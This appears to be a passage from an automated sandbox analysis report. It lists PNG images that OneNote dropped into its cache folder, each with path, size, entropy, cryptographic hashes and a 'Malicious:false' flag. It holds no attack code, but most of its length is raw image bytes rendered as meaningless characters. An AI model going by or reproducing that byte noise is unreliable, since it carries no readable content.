                                                                                                                                            Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001Q.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001R.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5386
                                                                                                                                            Entropy (8bit):7.943706538857394
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                            MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                            SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                            SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                            SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001T.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.950380155401321
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                            MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                            SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                            SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                            SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001U.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14553
                                                                                                                                            Entropy (8bit):7.951135681293377
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                            MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                            SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                            SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                            SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001V.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8184
                                                                                                                                            Entropy (8bit):7.807848176906598
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                            MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                            SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                            SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                            SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000020.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1924
                                                                                                                                            Entropy (8bit):7.836744258175623
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                            MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                            SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                            SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                            SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000021.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11886
                                                                                                                                            Entropy (8bit):7.946442244439929
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                            MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                            SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                            SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                            SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000022.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2270
                                                                                                                                            Entropy (8bit):7.845368393313232
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                            MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                            SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                            SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                            SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000023.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16003
                                                                                                                                            Entropy (8bit):7.959532793770661
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                            MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                            SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                            SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                            SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000024.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13241
                                                                                                                                            Entropy (8bit):7.931391290415517
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                            MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                            SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                            SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                            SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000025.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4190
                                                                                                                                            Entropy (8bit):7.94161730428269
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                            MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                            SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                            SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                            SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000026.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4081
                                                                                                                                            Entropy (8bit):7.943373267196131
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                            MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                            SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                            SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                            SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000027.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
